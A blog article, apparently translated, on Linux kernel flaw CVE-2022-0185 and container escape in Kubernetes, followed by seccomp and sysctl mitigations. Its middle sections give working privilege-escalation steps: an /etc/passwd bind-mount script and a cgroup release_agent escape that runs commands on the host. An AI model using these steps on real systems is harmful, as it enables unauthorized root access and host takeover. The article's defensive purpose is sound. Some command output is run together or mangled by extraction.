Author: Mi Yang Yang, KubeSphere evangelist, Cloud native severe infection

On January 18, 2022, Linux maintainers and vendors discovered a heap buffer overflow vulnerability in the Legacy_parse_param function of the Linux kernel (5.1-RC1 +) file system context function, The ID of this vulnerability is CVE-2022-0185, which is a high-risk vulnerability with a severity level of 7.8.

This vulnerability allows out-of-bounds writes to kernel memory. Using this vulnerability, an unprivileged attacker can bypass any Linux namespace restrictions and boost its privileges to root. For example, if an attacker infiltrates your container, it can escape from the container and increase permissions.

The vulnerability was introduced in the 5.1-RC1 version of the Linux kernel in March 2019. A patch released on January 18 fixed the problem and advised all Linux users to download and install the latest version of the kernel.

Vulnerability details

The vulnerability is caused by an integer underflow condition found in the legacy_parse_param function of the file system Context function (fs/fs_context.c). The function of the file system context is to create super blocks for mounting and remounting the file system. Super blocks record the characteristics of a file system, such as block and file size, as well as any storage blocks.

By sending more than 4095 bytes of input to the legacy_parse_param function, you can bypass the input length detection, resulting in out-of-bounds writes and triggering the vulnerability. An attacker can exploit this vulnerability to write malicious code to other parts of memory, causing a system crash, or to execute arbitrary code to boost permissions.

The input data for the legacy_parse_param function is added via the FSconfig system call to configure the creation context of the file system (such as the superblock for the ext4 file system).

// Add a null-terminated string pointed to by val using the fsconfig system call
fsconfig(fd, FSCONFIG_SET_STRING, "\x00", val, 0);
Copy the code

To use fsconfig system calls, an unprivileged user must have at least the CAP_SYS_ADMIN privilege in his or her current namespace. This means that if a user can access another namespace with these permissions, it is sufficient to exploit the vulnerability.

If an unprivileged user cannot get CAP_SYS_ADMIN permissions, an attacker can unshare (CLONE_NEWNS | CLONE_NEWUSER) system call to get the permission. The Unshare system call lets the user create or clone a namespace or user with the necessary permissions for further attacks. This technique is important for using the Linux namespace to isolate Pod’s Kubernetes from the container world. An attacker can take advantage of this in a container escape attack, which, once successful, gives the attacker full control over the host operating system and all containers running on the system. To further attack other machines in the Intranet segment, or even deploy malicious containers in a Kubernetes cluster.

The team behind the discovery posted the code and proof of concept to exploit the vulnerability on GitHub on January 25.

PoC

Docker and other containers run by default using the Seccomp configuration file to prevent processes in the container from making dangerous system calls in order to protect Linux namespace boundaries.

Seccomp (full name: Secure Computing Mode) introduced the Linux kernel in version 2.6.12 (March 8, 2005) and limited the system calls available to a process to four types: read, write, _exit, and SIGRETURN. The original mode was whitelisted, and in this safe mode, the kernel would kill the process with SIGKILL or SIGSYS if it tried any system calls other than the open file descriptor and the four system calls allowed.

However, Kubernetes by default does not use any Seccomp or AppArmor/SELinux profiles to restrict Pod system calls, which is dangerous. Processes in Pod can freely access dangerous system calls. Wait for opportunities to acquire necessary privileges (such as CAP_SYS_ADMIN) for further attacks.

In a standard Docker environment, the unshare command is not available. Docker’s Seccomp filter blocks the system call used by this command.

$ docker run --rm -it alpine /bin/sh
/ # unshare
unshare: unshare(0x0): Operation not permitted
Copy the code

Kubernetes Pod:

$ kubectl run --rm -it test --image=ubuntu /bin/bash
If you don't see a command prompt, try pressing enter. root@test:/# lsns | grep user 4026531837 user 3 1 root /bin/bash root@test:/# root@test:/# apt update && apt install -y libcap2 libcap-ng-utils root@test:/# ...... root@test:/# pscap -a ppid pid name command capabilities 0 1 root bash chown, dac_override, fowner, fsetid, kill, setgid, setuid, setpcap, net_bind_service, net_raw, sys_chroot, mknod, audit_write, setfcapCopy the code

We can see that the root user in Pod does not have CAP_SYS_ADMIN capability, but we can obtain CAP_SYS_ADMIN capability through the unshare command.

root@test: /# unshare -Urm
#
# pscap -a
ppid  pid   name        command           capabilities
0     1     root        bash              chown, dac_override, fowner, fsetid, kill, setgid, setuid, setpcap, net_bind_service, net_raw, sys_chroot, mknod, audit_write, setfcap
1     265   root        sh                full
# lsns | grep user
4026532695 user        3   265 root -sh
Copy the code

So what can you do with CAP_SYS_ADMIN? Here are two examples of how CAP_SYS_ADMIN can be used to infiltrate a system.

The rights of common users are promoted to root users.

The following operations can directly promote a common user on the host to the root user.

Start by giving PYTHon3 the CAP_SYS_ADMIN capability (note that you cannot operate on soft links, only on raw files).

$ whichPython3 /usr/bin/python3 $ll /usr/bin/python3 LRWXRWXRWX 1 root root 9 Mar 13 2020 /usr/bin/python3 -> python3.8* $setcapCAP_SYS_ADMIN + ep/usr/bin/python3.8 $getcapThe/usr/bin/python3.8 / usr/bin/python3.8 = cap_sys_admin + epCopy the code

Create a normal user.

$ useradd test -d /home/test -m
Copy the code

Then switch to normal user and enter the user home directory.

$ su test
$ cd ~
Copy the code

Copy /etc/passwd to the current directory and change the password of user root to “password”.

$ cp /etc/passwd ./
$ openssl passwd -1 -salt abc password
$1$abc$BXBqpb9BZcZhXLgbee.0s/

$1$ABC $bXBqpb9bzczhxlgbee.0s /
$ head -2 passwd
root:$1$abc$BXBqpb9BZcZhXLgbee.0s/:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
Copy the code

Mount the passwd file to /etc/passwd.

# cat mount-passwd.py
from ctypes import *
libc = CDLL("libc.so.6")
libc.mount.argtypes = (c_char_p, c_char_p, c_char_p, c_ulong, c_char_p)
MS_BIND = 4096
source = b"/home/test/passwd"
target = b"/etc/passwd"
filesystemtype = b"none"
options = b"rw"
mountflags = MS_BIND
libc.mount(source, target, filesystemtype, mountflags, options)
Copy the code
$ python3 mount-passwd.py
Copy the code

** The last moment is to witness the miracle!! ** Switch to user root and enter the password” password”.

$ su root
Password: 
root@coredns:/home/test#
Copy the code

Amazing, switch to root…

Let’s see if we have the root permission:

$ find / -name "*flag*" 2>/dev/null
/sys/kernel/tracing/events/power/pm_qos_update_flags
/sys/kernel/debug/tracing/events/power/pm_qos_update_flags
/sys/kernel/debug/block/vdb/hctx0/flags
/sys/kernel/debug/block/vda/hctx0/flags
/sys/kernel/debug/block/loop7/hctx0/flags
/sys/kernel/debug/block/loop6/hctx0/flags
/sys/kernel/debug/block/loop5/hctx0/flags
/sys/kernel/debug/block/loop4/hctx0/flags
/sys/kernel/debug/block/loop3/hctx0/flags
/sys/kernel/debug/block/loop2/hctx0/flags
/sys/kernel/debug/block/loop1/hctx0/flags
/sys/kernel/debug/block/loop0/hctx0/flags
....

$ cat /sys/kernel/debug/block/vdb/hctx0/flags
alloc_policy=FIFO SHOULD_MERGE
Copy the code

Yeah, root.

Finally, uninstall /etc/passwd.

$ umount /etc/passwd
Copy the code

So, System Reboot engineers, take a look at the CAP_SYS_ADMIN capabilities of ordinary users you assign to others

View all host processes in the container!

As an example of a container, the following operations will allow you to retrieve all the processes running on the host from the container.

We don’t need to run the privileged container using the — Privileged parameter, that would be boring.

$ docker run --rm -it --cap-add=SYS_ADMIN --security-opt apparmor=unconfined ubuntu bash
Copy the code

The following command is then executed in the container, resulting in the ps aux command being executed on the host and its output being saved to the /output file in the container.

# Mounts the RDMA cgroup controller and create a child cgroup
# This technique should work with the majority of cgroup controllers
# If you're following along and get "mount: /tmp/cgrp: special device cgroup does not exist"
# It's because your setup doesn't have the RDMA cgroup controller, try change rdma to memory to fix it
mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/x
# Finds path of OverlayFS mount for container
# Unless the configuration explicitly exposes the mount point of the host filesystem
# see https://ajxchapman.github.io/containers/2020/11/19/privileged-container-escape.html
host_path=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`
# Sets release_agent to /path/payload
echo "$host_path/cmd" > /tmp/cgrp/release_agent
# Creates a payload
echo '#! /bin/sh' > /cmd
echo "ps aux > $host_path/output" >> /cmd
chmod a+x /cmd
# Executes the attack by spawning a process that immediately ends inside the "x" child cgroup
# By creating a /bin/sh process and writing its PID to the cgroup.procs file in "x" child cgroup directory
# The script on the host will execute after /bin/sh exits 
sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"
# Reads the output
cat /output
Copy the code

Eventually you can see all the processes running on the host in the container:

root@0c84f7587629:/# cat /outputUSER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND root 1 0.0 0.3 172704 13148? Ss 2021 131:32 /sbin/init nopti root 2 0.0 0.0 0 0? S 2021 0:18 [kthreadd] root 3 0.0 0.0 0 0? I< 2021 0:00 [rcu_gp] root 4 0.0 0.0 0? I< 2021 0:00 [rcu_par_gp] root 6 0.0 0.0 0? I< 2021 0:00 [kworker/0:0 h-kblockd] root 8 0.0 0.0 0? I< 2021 0:00 [mm_percpu_wq] root 9 0.0 0.0 00? S 2021 18:36 [ksoftirqd/0] root 10 0.0 0.0 0? I 2021 262:22 [rcu_sched] root 11 0.0 0.0 0? S 2021 3:06 [migration/0] root 12 0.0 0.0 0 0? S 2021 0:00 [IDle_inject /0] root 14 0.0 0.0 00? S 2021 0:00 [cpuhp/0] root 15 0.0 0.0 00? S 2021 0:00 [cpuhp/1] ......Copy the code

I won’t explain the exact meaning of these commands, but you can check the notes for yourself if you are interested.

To be sure, CAP_SYS_ADMIN capability opens up more possibilities for attackers, both in the host machine and in the container, and especially in the container environment, if we are unable to upgrade the kernel due to irresistible factors, we need to find other solutions.

The solution

Container level

Starting with v1.22, Kubernetes can use SecurityContext to add the default Seccomp or AppArmor profile to a resource object, To protect Pod, Deployment, Statefulset, Daemonset, etc. While this feature is currently in Alpha, users can add their own Seccomp or AppArmor profile and define it in SecurityContext. Such as:

# pod-test.yaml
apiVersion: v1
kind: Pod
metadata:
  name: protected
spec:
  containers:
    - name: protected
      image: ubuntu
      command:
      - sleep
      - infinity
      securityContext:
        seccompProfile:
          type: RuntimeDefault
Copy the code

After creating the Pod, try using unshare to get the CAP_SYS_ADMIN capability.

$ kubectl exec -it protected -- bash
root@protected:/#
root@protected:/# unshare -Urm
unshare: unshare failed: Operation not permitted
Copy the code

The output shows that the unshare system call was successfully blocked, preventing the attacker from taking advantage of this capability.

Host level

Another option is to disable the user namespace capability from the host level without requiring a system restart. For example, in Ubuntu, you only need to execute the following two commands to take effect immediately, and it will take effect when you restart the system.

$ echo "kernel.unprivileged_userns_clone=0" > /etc/sysctl.d/userns.conf
$ sysctl -p /etc/sysctl.d/userns.conf
Copy the code

For the Red Hat system, run the following command to achieve the same effect.

$ echo "user.max_user_namespaces=0" > /etc/sysctl.d/userns.conf
$ sysctl -p /etc/sysctl.d/userns.conf
Copy the code

The following are the suggestions for dealing with this vulnerability:

  • If your environment is comfortable with patching the kernel and rebooting the system, it’s best to patch or upgrade the kernel.
  • Reduce the use of privileged containers that have access to CAP_SYS_ADMIN.
  • For containers without privileges, make sure there is a Seccomp filter to block their calls to unshare to reduce the risk. Docker is ok, Kubernetes needs extra operations.
  • The Seccomp profile can be enabled for all workloads in the Kubernetes cluster in the future. Currently, this feature is still in the Alpha stage and needs to be enabled through feature gate.
  • The ability to disable users from using the User Namespace at the host level.

Write in the last

Container environment is complex, especially distributed scheduling platform like Kubernetes, each link has its own life cycle and attack surface, it is easy to expose security risks, container cluster administrators must pay attention to every detail of security issues. In summary, the security of the container depends on the security of the Linux kernel in most cases, so we need to keep an eye on any security issues and implement solutions as soon as possible.

The resources

  • CVE-2022-0185: Kubernetes Container Escape Using Linux Kernel Exploit
  • CVE-2022-0185: Detecting and mitigating Linux Kernel vulnerability causing container escape
  • Excessive Capabilities
  • CAP_SYS_ADMIN

This article is published by OpenWrite!